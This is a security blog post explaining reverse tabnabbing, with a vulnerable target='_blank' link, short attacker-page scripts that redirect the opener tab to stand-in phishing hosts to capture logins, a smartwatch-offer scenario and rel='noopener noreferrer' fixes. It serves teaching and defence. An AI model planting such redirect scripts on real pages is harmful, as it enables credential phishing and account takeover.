Reverse Tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. Here, the redirection happens through links from the parent site to attacker’s site.
In tabnabbing attackers take advantage and control of victims unattended browser tabs by hijacking and redirecting him to malicious URLs where they can perform a phishing attack and execute scripts.
An attacker redirects the page the victim came from which is in different tab to a phishing page and then victim ends up navigating to the page. And then the victim thinks that he/she is on the right page but in reality you actually ended up on an attacker’s page. And if the victim authenticates to this phishing page then the credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
How does reverse tabnabbing attack work:
Websites may contain links to other websites and such links are sometimes opened in a new tab. If we add target=”_blank” to <a> element in HTML, the link will open in a new tab. The page we link through href might be either safe or unsafe. And we do not really know if the href link is of legitimate page or malicious since we have no control of it.
<a href=”page.site.com” target=”_blank”>
If a linked page is opened with target=”_blank” or by window.open() in Javascript, then the linked page will have access to the same window.opener-property as the linking page. Thus, the linked page can set the property window.opener.location to any domain it wants.
|
|
Let us check the following code snippet which contains an unsafe target blank implementation:
Vulnerable page:
<!DOCTYPE HTML>
<html>
<head>
<title>Reverse Tabnabbing</title>
</head>
<body>
<a href=”evil.sample.com” target=”_blank”>Click me</a>
</body>
</html>
Malicious Site Code:
<!DOCTYPE HTML>
<html>
<body>
<script>
if (window.opener) {
window.opener.location = “https://phish.sample.com”;
}
</script>
</body>
</html>
Now if the victim clicks on the Vulnerable Page link/button, the Malicious Site will be opened in a new tab but the target website in the inactive/last tab will be replaced by the phishing website.
The following <a href=”https://sample.com/” target=”_blank”>link</a> is vulnerable to reverse tabnabbing because it uses target=”_blank”.
This means the page that opens in a new tab can access the initial tab and change its location using the window.opener property.
Let’s see this attack in the real-world attack scenario:
Victim has opened social networking website called funchat.com in a browser window. He logged into the site and sees that someone has posted about an offer in his wall.
A great deal with 30% offer on branded Smartwatches!!
The victim negligently clicks the link which opens the eshop.com with the offer in a new tab. eshop is a malicious website controlled by the attacker.
Attacker has written the code for his website something like this.
<!DOCTYPE HTML>
<html>
<body>
<script>
if (window.opener) {
window.opener.location = “https://funnchat.com/login.php”;
}
</script>
<h1>AMAZING DEAL ON SMARTWATCHES!!</h1>
. . .
</body>
</html>
When victim is checking the fake offers on the malicious website, the malicious site forces the redirection of victim’s original funchat opened tab to the fake website (funnchat.com) controlled by attacker which looks exactly like funchat website’s login page.
Fake website’s login page appears and ask the victim to reenter the login credentials. Being prompted for login credentials happens from time to time, so the victim does not think too much about it and enters the username and password.
Voilà. The attacker has stolen the victim’s login credentials.
Impact:
This attack makes it quite probable for even an attentive user to be lured into revealing his or her confidential information. The user does not suspect that their credentials have been stolen, simply believing that they have entered their password incorrectly on the fake login phishing page. Attacker can steal the victim’s login credentials and take over victim’s account.
Solutions:
The below fixes can be used to prevent this attack.
- Add rel=”noopener noreferrer” to every <a> element that has target set to “_blank”. noopener ensures that the linked page does not have access to window.opener from the linking page. noreferrer make sure that the request referrer header is not being sent. Thus, the destination site will not see the URL the user came from.
<HTML Code>
<a href=https://evil.sample.com rel=”noopener noreferrer” target=”_blank”>click here</a>
- If Javascript is being used, the same can be achieved by setting the opener-property to null.
var myNewWindow = window.open(url, name, ‘noopener,noreferrer’)
myNewWindow.opener = null
If the user-generated content is being shown on the page, then sanitize the input and apply “noopener noreferrer” to every link.
The post Reverse Tabnabbing appeared first on Security Intelligence.
This post appeared first on Security Intelligence
Author: NewsCred System